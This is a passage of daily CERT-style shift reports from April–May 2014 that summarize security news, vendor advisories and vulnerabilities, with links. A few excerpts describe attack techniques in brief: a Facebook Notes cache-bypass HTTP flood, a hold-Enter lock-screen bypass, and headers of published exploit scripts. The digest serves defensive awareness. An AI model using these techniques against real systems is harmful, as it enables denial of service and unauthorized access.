=======================
= End-of-Shift report =
=======================
Timeframe: Monday 05-05-2014 18:00 − Tuesday 06-05-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** NIST updates Transport Layer Security (TLS) guidelines ***
---------------------------------------------
The National Institute of Standards and Technology (NIST) has released an update to a document that helps computer administrators maintain the security of information traveling across their networks.
---------------------------------------------
http://www.net-security.org/secworld.php?id=16794
*** Finding Weak Remote Access Passwords on POS Devices ***
---------------------------------------------
One of my key takeaways from the Verizon Data Breach Incident Report was that credentials were a major attack vector in 2013. Especially within the POS intrusions, brute forcing and the use of stolen credentials were a major problem.
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/05/05/finding-w…
*** Analyzing CVE-2014-0515 - The Recent Flash Zero-Day ***
---------------------------------------------
Last week, Adobe released an advisory disclosing a new zero-day vulnerability in Flash Player. Looking into the exploit code used in attacks targeting this vulnerability, we found several interesting ties to other vulnerabilities - not all of them for Flash Player, either. To explain this, we will discuss the highlights of how this exploit was performed.
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/H6laAIdlckU/
*** Live from InfoSecurity Europe 2014: The Nitty Gritty of Sandbox Evasion ***
---------------------------------------------
Infosecurity Europe 2014 was a great gathering of the top minds in cybersecurity, and in case you missed the event, we were excited to capture live content from the show floor to share with our readers. Over the next few...
---------------------------------------------
http://www.fireeye.com/blog/corporate/2014/05/live-from-infosecurity-europe…
*** And the Web it keeps Changing: Recent security relevant changes to Browsers and HTML/HTTP Standards, (Tue, May 6th) ***
---------------------------------------------
As we all know, web standards only leave "draft" status once they start becoming irrelevant. It is a constant challenge to keep up with how web browsers interpret standards and how the standards themselves keep changing. We are just going through one of the perpetual updates for our "Defending Web Applications" class, and I got reminded again about some of the changes we had to make over the last year or so. Autocomplete=Off: This weekend we just had yet another post...
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=18075&rss
*** Watch a bank-raiding ZeuS bot command post get owned in 60 seconds ***
---------------------------------------------
RC4? Shoddy PHP coding? You VXers should try a little harder. Web thieves may get more than they bargained for if tech pros follow the lead of one researcher, who demonstrated how to hack the systems remote-controlling the infamous ZeuS crime bot in 60 seconds.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/05/06/zeus_pwned_…
*** The State of Cryptography in 2014, Part 1: On Fragility and Heartbleed ***
---------------------------------------------
It seems like cryptography has been taking a knock recently. This is both good and bad, but is not actually true: cryptography is always under attack, and for that reason constantly evolves. That's bad, but it's good to realize that cryptography needs constant attention. The threat to cryptography can be very disruptive, as we most recently...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/kwDfInwBFvo/
*** Dropbox closes Referer hole ***
---------------------------------------------
Dropbox documents shared with a limited audience can be exposed when a link contained in them is clicked. With the fix, however, the cloud provider makes all existing shared documents unreachable; they have to be shared again.
---------------------------------------------
http://www.heise.de/security/meldung/Dropbox-schliesst-Referer-Luecke-21835…
*** Security Bulletin: Multiple Vulnerabilities in IBM iNotes (CVE-2013-0589, CVE-2013-0592, CVE-2013-0594, CVE-2013-0595) ***
---------------------------------------------
IBM iNotes versions prior to 8.5.3 Fix Pack 6 and 9.0.1 contain multiple security vulnerabilities: CVE-2013-0589, CVE-2013-0592, CVE-2013-0594 and CVE-2013-0595.
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21671622
*** Update for Vulnerability in Juniper Networks Windows In-Box Junos Pulse Client - Version: 1.0 ***
---------------------------------------------
Microsoft is announcing the availability of an update for the Juniper Networks Windows In-Box Junos Pulse Client for Windows 8.1 and Windows RT 8.1. The update addresses a vulnerability in the Juniper VPN client by updating the affected Juniper VPN client libraries contained in affected versions of Microsoft Windows.
---------------------------------------------
https://technet.microsoft.com/en-us/library/security/2962393
*** Bugtraq: ESA-2014-028: EMC Cloud Tiering Appliance XML External Entity (XXE) and Information Disclosure Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532031
*** Bugtraq: [security bulletin] HPSBGN03010 rev.4 - HP Software Server Automation running OpenSSL, Remote Disclosure of Information ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532037
*** Cisco Nexus 1000V Access Control List Bypass Vulnerability ***
---------------------------------------------
A vulnerability in Cisco Nexus 1000V switches could allow an unauthenticated, remote attacker to bypass deny statements in access control lists (ACLs) with certain types of Internet Group Management Protocol version 2 (IGMPv2) or IGMP version 3 (IGMPv3) traffic. IGMP version 1 (IGMPv1) is not affected.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Cisco Broadcast Access Center for Telco and Wireless Cross-Site Request Forgery Vulnerability ***
---------------------------------------------
A vulnerability in the web framework of the Cisco Broadcast Access Center for Telco and Wireless (BAC-TW) could allow an unauthenticated, remote attacker to perform a cross-site request forgery (CSRF) attack against the Cisco BAC-TW web interface.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Cisco Broadcast Access Center for Telco and Wireless Cross-Site Scripting Vulnerability ***
---------------------------------------------
A vulnerability in the web framework of the Cisco Broadcast Access Center for Telco and Wireless (BAC-TW) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the Cisco BAC-TW web interface.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Struts 2.3.16.3 Manipulation Fix ***
---------------------------------------------
Topic: Struts 2.3.16.3 Manipulation Fix
Risk: Medium
Text: The Apache Struts group is pleased to announce that Struts 2.3.16.3 is available as a "General Availability" release. The GA de...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014050026
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 02-05-2014 18:00 − Monday 05-05-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Lnk files in Email Malware Distribution ***
---------------------------------------------
Recently I have noticed more use of .lnk files used in malware distribution via email. These files are Windows Shortcut files, typically used for shortcuts on your system, such as on your desktop. The use of .lnk files in emails is not new, but a recent sample caught my eye and I took a closer look. The original email, as it would appear to the recipient, looked like this, purporting to be from an individual at Automatic Data Processing, and containing what looks to be a PDF document and a ZIP
---------------------------------------------
http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/VEYzrNB7xos/lnk-files-…
*** PHP Updated to Fix OpenSSL Flaws, Other Bugs ***
---------------------------------------------
The maintainers of PHP have released two new versions of the scripting language that fix a number of bugs, including a pair of vulnerabilities related to OpenSSL. Versions 5.4.28 and 5.5.12 both contain that important patch, as well as fixes for more than a dozen other vulnerabilities. The fix for the OpenSSL flaws is in both...
---------------------------------------------
http://threatpost.com/php-updated-to-fix-heartbleed-other-bugs/105867
*** iOS 7 Update Silently Removes Encryption For Email Attachments ***
---------------------------------------------
An anonymous reader writes "Apple has removed encrypted email attachments from iOS 7. Apple said back in June 2010 in regards to iOS 4.0: Data protection is available for devices that offer hardware encryption, including iPhone 3GS and later, all iPad models, and iPod touch (3rd generation and later). Data protection enhances the built-in hardware encryption by protecting the hardware encryption keys with your passcode. This provides an additional layer of protection for your email
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/FyN_d8fBQgo/story01.htm
*** Attack Prediction: Malicious gTLD Squatting May Be The Next Big Threat ***
---------------------------------------------
Late last year, ICANN began expanding the generic Top-Level Domains (gTLDs). In addition to the standard .COM, .ORG, and .NET TLDs, over 1,300 new names could become available in the next few years. These new gTLDs and internationalized domain names (IDNs) are awesome ideas if you think about the creativity sparked around the names one can possibly register.
---------------------------------------------
http://labs.opendns.com/2014/04/23/malicious-gtld-squatting/
*** Spear Phishing Emails: A Psychological Tactic of Threat Actors ***
---------------------------------------------
By exploiting network security vulnerabilities, today's generation of threat actors is able to install advanced polymorphic malware to steal data and damage reputations. But their manipulation efforts aren't limited to code and machines - they extend to people, too.
---------------------------------------------
http://www.seculert.com/blog/2014/05/spear-phishing-emails-a-psychological-…
*** Evolution of Encrypting Ransomware ***
---------------------------------------------
Recently we've seen a big change in the encrypting ransomware family, and we're going to shed light on some of the newest variants and the stages of evolution that have led this high-profile malware to where it is today. For those who aren't aware of what encrypting ransomware is, it's a cryptovirus that encrypts all your data on local hard drives, network shared drives, removable hard drives and USB devices. The encryption is done using an RSA-2048 asymmetric public key, which makes...
---------------------------------------------
http://feedproxy.google.com/~r/WebrootThreatBlog/~3/hp9iym0nxN0/
*** Symantec Critical System Protection for Windows Default Policy Bypass ***
---------------------------------------------
Revisions: None
Severity: Symantec does not believe that this bypass represents a Symantec Critical System Protection (SCSP) vulnerability. The policy bypass ...
---------------------------------------------
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se…
*** Bugtraq: [ANN][SECURITY] Struts 1 - CVE-2014-0114 -Mitigation Advice Available, Possible RCE Impact ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532008
*** Vuln: F5 Networks BIG-IQ Remote Privilege Escalation Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/67191
*** F5 BIG-IQ 4.1.0.2013.0 Password Change Exploit ***
---------------------------------------------
Topic: F5 BIG-IQ 4.1.0.2013.0 Password Change Exploit
Risk: High
Text: ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-fr...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014050012
*** OpenSSL Null Pointer Dereference in do_ssl3_write() Lets Remote Users Deny Service ***
---------------------------------------------
http://www.securitytracker.com/id/1030188
*** [webapps] - Seagate BlackArmor NAS - Multiple Vulnerabilities ***
---------------------------------------------
http://www.exploit-db.com/exploits/33159
*** Vuln: WordPress NextCellent Gallery Plugin CVE-2014-3123 Multiple Cross Site Scripting Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/bid/67085
*** IBM Tivoli Netcool/Portal vulnerable to CVE-2014-0160 & CVE-2014-0076 ***
---------------------------------------------
Security vulnerabilities have been discovered in OpenSSL.
CVE(s): CVE-2014-0160 and CVE-2014-0076
Affected product(s) and affected version(s): IBM Tivoli Netcool/Portal 2.1.2
Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21671783
X-Force Database: http://xforce.iss.net/xforce/xfdb/92322
X-Force Database: http://xforce.iss.net/xforce/xfdb/91990
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_tivoli_netcool_po…
*** IBM Security Bulletin: Multiple OpenSSL vulnerabilities in Tivoli Endpoint Manager for Remote Control. (CVE-2013-4353,CVE-2013-6449) ***
---------------------------------------------
Security vulnerabilities exist in the version of OpenSSL shipped with Tivoli Endpoint Manager for Remote Control.
CVE(s): CVE-2013-4353 and CVE-2013-6449
Affected product(s) and affected version(s): Tivoli Endpoint Manager for Remote Control version 8.2.1.
Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://www.ibm.com/support/docview.wss?uid=swg21669040
X-Force Database: http://xforce.iss.net/xforce/xfdb/90201
X-Force
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** Bugtraq: [HP security bulletins] ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532002
http://www.securityfocus.com/archive/1/532001
http://www.securityfocus.com/archive/1/532003
http://www.securityfocus.com/archive/1/532004
http://www.securityfocus.com/archive/1/532007
http://www.securityfocus.com/archive/1/532010
http://www.securityfocus.com/archive/1/532011
http://www.securityfocus.com/archive/1/532012
http://www.securityfocus.com/archive/1/532013
http://www.securityfocus.com/archive/1/532014
http://www.securityfocus.com/archive/1/532022
http://www.securityfocus.com/archive/1/532023
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 30-04-2014 18:00 − Friday 02-05-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Serious security flaw in OAuth, OpenID discovered ***
---------------------------------------------
Attackers can use the "Covert Redirect" vulnerability in both open-source login systems to steal your data and redirect you to unsafe sites.
---------------------------------------------
http://www.cnet.com/news/serious-security-flaw-in-oauth-and-openid-discover…
*** Ubuntu closes further holes in the Unity lock screen ***
---------------------------------------------
With two updates for their Unity desktop, the developers of the Linux distribution have fixed further security problems. These would have made it possible, under certain circumstances, to bypass the lock screen.
---------------------------------------------
http://www.heise.de/security/meldung/Ubuntu-schliesst-weitere-Luecken-im-Un…
*** Security Update Released to Address Recent Internet Explorer Vulnerability ***
---------------------------------------------
Today, we released a security update to address the Internet Explorer (IE) vulnerability first described in Security Advisory 2963983. This security update addresses every version of Internet Explorer. While we've seen only a limited number of targeted attacks, customers are advised to install this update promptly. The majority of our customers have automatic updates enabled and so will not need to take any action as protections will be downloaded and installed automatically. If...
---------------------------------------------
http://blogs.technet.com/b/msrc/archive/2014/05/01/security-update-released…
*** Sefnit Botnet Swaps Tor for SSH ***
---------------------------------------------
Facebook security researchers spot a Sefnit/Mevade click-fraud and Bitcoin-mining botnet returning to its previous SSH command-and-control communications infrastructure.
---------------------------------------------
http://www.darkreading.com/attacks-breaches/sefnit-botnet-swaps-tor-for-ssh…
*** Factsheet DNS Amplification ***
---------------------------------------------
DDoS-attacks have been hitting headlines the last year. In some of these attacks, attackers use a technique called DNS amplification. This factsheet will help network administrators in preventing DNS amplification attacks via their systems.
---------------------------------------------
http://www.ncsc.nl/english/current-topics/news/factsheet-dns-amplification.…
*** Apple Fixes Critical Hole in Developer Center ***
---------------------------------------------
Apple patched a potentially serious hole in its Developer Center that could have given anyone unfettered access to personal contact information for Apple employees and partners.
---------------------------------------------
http://threatpost.com/apple-fixes-critical-hole-in-developer-center/105848
*** All About Windows Tech Support Scams ***
---------------------------------------------
*Editor's Notes: The purpose of this research was to see exactly how this scam is carried out, and the extent to which it is done. DO NOT TRY THIS AT HOME. We used a clean machine, off network, to monitor the activity of the scammer. Have you ever received a phone call from a tech support person claiming to be from Microsoft, saying that your Windows-based machine has been found to have a virus on it? These cold calls typically come from loud call centers, and are targeting the uninformed and...
---------------------------------------------
http://feedproxy.google.com/~r/WebrootThreatBlog/~3/qw_08fRmr5o/
*** SA-CONTRIB-2014-047 - Zen - Cross Site Scripting ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-047
Project: Zen (third-party theme)
Version: 7.x
Date: 2014-April-30
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Cross Site Scripting
Description: The Zen theme is a powerful, yet simple, HTML5 starting theme with a responsive, mobile-first grid design. The theme does not properly sanitize theme settings before they are used in the output of a page. Custom themes that have copied Zen's template files (e.g. subthemes) may suffer from this
---------------------------------------------
https://drupal.org/node/2254925
*** Cross-Site Scripting Vulnerability in Citrix NetScaler Gateway, formerly Citrix Access Gateway Enterprise Edition ***
---------------------------------------------
Severity: Medium
Description of Problem: A Cross-Site Scripting (XSS) vulnerability has been identified in Citrix NetScaler Gateway, formerly known as Citrix Access Gateway Enterprise Edition...
---------------------------------------------
http://support.citrix.com/article/CTX140291
*** Cisco TelePresence TC and TE Bugs Let Remote Users Execute Arbitrary Code and Deny Service and Let Local Users Gain Elevated Privileges ***
---------------------------------------------
http://www.securitytracker.com/id/1030181
*** AMTELCO miSecure Vulnerabilities ***
---------------------------------------------
Researcher Jared Bird of Allina Health reported multiple vulnerabilities in the AMTELCO miSecureMessage (MSM) medical messaging system. AMTELCO has an update available to all customers that mitigates the vulnerabilities.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-121-01
*** WordPress plugin EZPZ One Click Backup Command Injection ***
---------------------------------------------
Topic: WordPress plugin EZPZ One Click Backup Command Injection
Risk: High
Text: Product: WordPress plugin EZPZ One Click Backup. Vulnerability type: CWE-78 OS Command Injection. Vulnerable versions: 12.03.10...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014050008
*** WordPress leaflet maps marker plugin SQL Injection Vulnerability ***
---------------------------------------------
Topic: WordPress leaflet maps marker plugin SQL Injection Vulnerability
Risk: Medium
Text: # # Exploit Title: WordPress leaflet maps marker plugin SQL Injection Vulnerability # # Author: neo.hapsis #memb...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014050010
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 29-04-2014 18:00 − Wednesday 30-04-2014 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** PHP Callback Functions: Another Way to Hide Backdoors ***
---------------------------------------------
We often find new techniques employed by malware authors. Some are very interesting, others are pretty funny, and then there are those that really stump us in their creativity and effectiveness. This post is about the latter. Everyone who writes code in PHP knows what the eval() function is ..
---------------------------------------------
http://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-b…
*** [papers] - Introduction to Android Malware Analysis ***
---------------------------------------------
http://www.exploit-db.com/download_pdf/33093
*** Xen HVMOP_set_mem_type Page Transition Flaw Lets Local Users on the Guest System Cause Denial of Service Conditions on the Host System ***
---------------------------------------------
http://www.securitytracker.com/id/1030160
*** "Bypassing endpoint protections" @ BSides London ***
---------------------------------------------
This week I presented at BSides London. The talk is titled "Layers on layers: bypassing endpoint protection". The purpose of this talk is to reiterate on the (well-known) common weakness of most endpoint protection products - their reliance on kernel integrity. Once the attacker achieves arbitrary code execution in the kernel, there ..
---------------------------------------------
http://labs.bromium.com/2014/04/29/bypassing-endpoint-protections-bsides-lo…
*** Cisco WebEx Meetings Server Cross-Site Request Forgery Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Be on the Lookout: Odd DNS Traffic, Possible C&C Traffic, (Wed, Apr 30th) ***
---------------------------------------------
We got an email from one of our readers, including an interesting port 53 packet. While Wireshark and TCPDump try to decode it as DNS, it is almost certainly not DNS. The payload of the packet is ..
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=18047&rss
*** Mozilla Thunderbird Multiple Flaws Let Remote Users Execute Arbitrary Code, Deny Service, and Conduct Cross-Site Scripting Attacks and Local Users Gain Elevated Privileges ***
---------------------------------------------
http://www.securitytracker.com/id/1030165
*** Mozilla Firefox Multiple Flaws Let Remote Users Execute Arbitrary Code, Deny Service, and Conduct Cross-Site Scripting Attacks and Local Users Gain Elevated Privileges ***
---------------------------------------------
http://www.securitytracker.com/id/1030163
*** [2014-04-30] SQL injection and XSS vulnerabilities in Typo3 si_bibtex extension ***
---------------------------------------------
By exploiting the SQL injection vulnerability in the Typo3 extension "si_bibtex", an attacker is able to gain full access to the Typo3 database. Depending on the location where the extension is used in the web application, this may be possible by an unauthenticated attacker. Furthermore, it is affected by persistent XSS.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** Symantec Encryption Desktop (PGP) Memory Access Flaws Let Remote Users Deny Service ***
---------------------------------------------
http://www.securitytracker.com/id/1030170
*** Friends don't let friends use Internet Explorer - advice from US, UK, EU ***
---------------------------------------------
IE 6 to 11 at risk of hijacking, patch coming - but not for XP. Microsoft has warned of a new security flaw in all versions of its Internet Explorer web browser for Windows PCs. A patch has yet to be released for the crocked code.
---------------------------------------------
www.theregister.co.uk/2014/04/27/oops_we_did_it_again_microsoft_warns_of_ie…
*** Botnet for altcoin mining exploits hole in Nagios monitoring ***
---------------------------------------------
A recently published security hole in the network monitor Nagios is apparently already being exploited. Well over 1000 servers distributed worldwide are affected and are being abused for mining purposes.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Botnetz-fuer-Altcoin-Mining-nutzt-Lu…
*** New ransomware Trojan encrypts with RSA-2048 ***
---------------------------------------------
Reports are piling up of infected Windows systems on which a malicious program encrypts files and releases them only against payment of a 500 euro ransom. The ransom is to be paid in bitcoins via Tor.
---------------------------------------------
http://www.heise.de/security/meldung/Neuer-Erpressungs-Trojaner-verschluess…
*** Protection strategies for the Security Advisory 2963983 IE 0day ***
---------------------------------------------
We've received a number of customer inquiries about the workaround steps documented in Security Advisory 2963983, published on Saturday evening. We hope this blog post answers those questions. Steps you can take to stay safe: The security advisory lists several options customers can take to stay safe. Those options are ..
---------------------------------------------
http://blogs.technet.com/b/srd/archive/2014/04/30/protection-strategies-for…
*** Six infosec tips I learned from Game of Thrones ***
---------------------------------------------
In Westeros - the land of dark knights, backstabbing royals, dragons, wildings, wargs, red witches, and White Walkers - even the youngest ones have to learn basic self-defense if they're to have any hope of surviving the cruel fictional world imagined by A Game of Thrones (GOT) author, George R. R. Martin. And so too, must every CISO and security pro learn the latest information security best practices if they're to survive today's Internet threat landscape.
---------------------------------------------
http://www.net-security.org/article.php?id=2001&p=1
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 28-04-2014 18:00 − Tuesday 29-04-2014 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** Update for Vulnerabilities in Adobe Flash Player in Internet Explorer - Version: 23.0 ***
---------------------------------------------
https://technet.microsoft.com/en-us/library/security/2755801
*** Ubuntu 14.04 lockscreen bypass, (Mon, Apr 28th) ***
---------------------------------------------
Upgraded to Ubuntu 14.04? Hold down enter to bypass the lockscreen (what is old is new again): https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572 ... The reporter indicates that he was running Ubuntu 14.04 with all the packages updated. When the screen is locked with a password, if holding ENTER, after some seconds the screen freezes and the lock screen ..
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=18039
*** Cisco ASA DHCPv6 Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Researchers warn of resurgent Sefnit malware ***
---------------------------------------------
Botnet returns using new tactics. A malware infection which drew headlines in January has returned and is using new techniques to infect and spread amongst users.
---------------------------------------------
www.theregister.co.uk/2014/04/29/researchers_warn_of_resurgent_sefnit_malwa…
*** Citrix NetScaler Application Delivery Controller and NetScaler Gateway Multiple Security Updates ***
---------------------------------------------
A number of security vulnerabilities have been identified in the management component of the Citrix NetScaler Application Delivery Controller ..
---------------------------------------------
http://support.citrix.com/article/CTX140651
*** Mass hack at AOL: millions of users affected ***
---------------------------------------------
Unknown attackers gain access to private information - the company asks users to change their passwords
---------------------------------------------
http://derstandard.at/1397521927406
*** The FireEye Advanced Threat Report 2013: European Edition ***
---------------------------------------------
We recently published the 2013 FireEye Advanced Threat Report during RSA Conference, providing a global overview of the advanced attacks that FireEye discovered last year. We are now drilling that global analysis down into the European threat ..
---------------------------------------------
http://www.fireeye.com/blog/corporate/2014/04/the-fireeye-advanced-threat-r…
*** Cybercriminals Take Advantage Of Heartbleed With Spam ***
---------------------------------------------
Since news about Heartbleed broke out earlier this month, the Internet has been full of updates, opinions and details about the vulnerability, with personalities ranging from security experts to celebrities talking about it. Being as opportunistic as they are, cybercriminals have taken notice of this and ..
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/RKpGQ6-RSA8/
*** Q1 2014 Mobile Threat Report ***
---------------------------------------------
Our Mobile Threat Report for Q1 2014 is out! Here are a couple of the things we cover in it: The vast majority of the new threats found were on Android (no surprise there), which accounted for 275 out of 277 new families we saw in this period, leaving 1 new malware apiece on iOS and Symbian. In Q1, ..
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002699.html
*** 6 free network vulnerability scanners ***
---------------------------------------------
Vulnerability scanners can help you automate security auditing and can play a crucial role in your IT security. They can scan your network and websites for up to thousands of different security risks, produce a prioritized list of those you should patch, describe the vulnerabilities, and give steps on how to remediate them. Some can even automate the patching process. While these tools can ..
---------------------------------------------
http://www.csoonline.com/article/2148841/data-protection/6-free-network-vul…
*** Hashcat-Utils v1.0 Released ***
---------------------------------------------
Hashcat-utils are a set of small utilities that are useful in advanced password cracking. They all are packed into multiple stand-alone binaries. All of these utils are designed to execute only one specific function. Since they all work with STDIN and STDOUT you can group them into chains. The programs are available for Linux and Windows on both 32 bit and 64 bit architectures. The programs are also available as open source.
---------------------------------------------
http://www.toolswatch.org/2014/04/hashcat-utils-v1-0-released/
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 25-04-2014 18:00 − Monday 28-04-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Using Facebook Notes to DDoS any website ***
---------------------------------------------
Facebook Notes allows users to include image tags. Whenever such a tag is used, Facebook crawls the image from the external server and caches it. Facebook will only cache the image once; however, by appending random GET parameters the cache can be bypassed, and the feature can be abused to cause a huge HTTP GET flood.
---------------------------------------------
http://chr13.com/2014/04/20/using-facebook-notes-to-ddos-any-website/
*** Mozilla slims down certificate verification ***
---------------------------------------------
Instead of 81,865, only 4,167 lines of code are now needed to verify SSL certificates. Anyone who finds security vulnerabilities in it receives a generous finder's reward.
---------------------------------------------
http://www.heise.de/security/meldung/Mozilla-entschlackt-Zertifkats-Ueberpr…
*** Examining the Heartbleed-based FUD that's pitched to the public ***
---------------------------------------------
The Heartbleed vulnerability has created a massive news cycle, and generated technical risk-based discussions that might actually do some good. But some of these discussions boggle the mind, spreading misinformation in order to generate clicks or sales. When security issues such as Heartbleed hit the mass media, there is a good deal of Fear, Uncertainty, and Doubt - better known as FUD - that gets promoted on the airwaves and in print.
---------------------------------------------
http://www.csoonline.com/article/2148461/application-security/examining-the…
*** Security vulnerability uncovered in messaging app Viber ***
---------------------------------------------
Pictures, videos and location data transmitted with the messaging app Viber are stored unencrypted on servers. Gaining access to them is extremely easy.
---------------------------------------------
http://futurezone.at/digital-life/sicherheitsluecke-bei-messaging-app-viber…
*** Microsoft Warns of Attacks on IE Zero-Day ***
---------------------------------------------
Microsoft is warning Internet Explorer users about active attacks that attempt to exploit a previously unknown security flaw in every supported version of IE. The vulnerability could be used to silently install malicious software without any help from users, save for perhaps merely browsing to a hacked or malicious site.
---------------------------------------------
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/PUm3t0AZZzc/
*** New Internet Explorer vulnerability becomes an emergency for Windows XP ***
---------------------------------------------
Already being actively exploited - no more updates for XP; other operating system versions are currently still unprotected as well
---------------------------------------------
http://derstandard.at/1397521804143
*** Biggest EU cyber security exercise to date: Cyber Europe 2014 taking place today ***
---------------------------------------------
Today, 28 April 2014, European countries kick off the Cyber Europe 2014 (CE2014). CE2014 is a highly sophisticated cyber exercise, involving more than 600 security actors across Europe.
---------------------------------------------
http://www.enisa.europa.eu/media/press-releases/biggest-eu-cyber-security-e…
*** Cisco IOS XE Software Malformed L2TP Packet Vulnerability ***
---------------------------------------------
A vulnerability in the Layer 2 Tunneling Protocol (L2TP) module of Cisco IOS XE on Cisco ASR 1000 Series Routers could allow an authenticated, remote attacker to cause a reload of the processing ESP card.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Security updates available for Adobe Flash Player (APSB14-13) ***
---------------------------------------------
A Security Bulletin (APSB14-13) has been published regarding security updates for Adobe Flash Player. These updates address a critical vulnerability, and Adobe recommends users update their product installations to the latest versions
---------------------------------------------
http://blogs.adobe.com/psirt/?p=1093
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 24-04-2014 18:00 − Friday 25-04-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Number of Sites Vulnerable to Heartbleed Plunges by Two-Thirds ***
---------------------------------------------
Two weeks ago, we talked about how many sites in the top 1 million domains (as judged by Alexa) were vulnerable to the Heartbleed SSL vulnerability. How do things stand today? (Figure 1. Sites vulnerable to Heartbleed as of April 22) Globally, the percentage of sites that are vulnerable to Heartbleed has fallen by two-thirds,...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/qyKz0tQVjAY/
*** Fareit trojan observed spreading Necurs, Zbot and CryptoLocker ***
---------------------------------------------
The Necurs and Zbot trojans, as well as CryptoLocker ransomware, have been observed by researchers as being spread through another trojan, known as Fareit.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/XrcbQ8kwwQo/
*** It's Insanely Easy to Hack Hospital Equipment ***
---------------------------------------------
When Scott Erven was given free rein to roam through all of the medical equipment used at a chain of large midwest health care facilities, he knew he would find security problems with the systems -- but he wasn't prepared for just how bad it would be.
---------------------------------------------
http://feeds.wired.com/c/35185/f/661467/s/39be98e1/sc/36/l/0L0Swired0N0C20A…
*** Out-of-band update for Windows 7 ***
---------------------------------------------
Windows 7 users are currently being offered an update with the number 2952664 by the update function. What is irritating about it: it appears outside the regular cycle, and Microsoft does not reveal exactly which problems the update fixes.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Update-fuer-Windows-7-ausser-der-Rei…
*** Acunetix 8 Scanner Buffer overflow ***
---------------------------------------------
Topic: Acunetix 8 Scanner Buffer overflow Risk: High Text:#!/usr/bin/python # Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit # Version: 8 # Build: 20120704 # Test...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014040162
*** Security Notice-Statement on Patch Bypassing of Apache Struts2 ***
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
*** Hitachi Multiple Products OpenSSL TLS/DTLS Heartbeat Two Information Disclosure Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/58022
*** Global Technology Associates GB-OS OpenSSL TLS/DTLS Heartbeat Two Information Disclosure Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/58007
*** Certec atvise scada OpenSSL Heartbleed Vulnerability ***
---------------------------------------------
Researcher Bob Radvanovsky of Infracritical has notified NCCIC/ICS-CERT that Certec has released new libraries that mitigate the OpenSSL Heartbleed vulnerability in atvise scada. This vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-114-01
*** Siemens SIMATIC S7-1200 CPU Web Vulnerabilities ***
---------------------------------------------
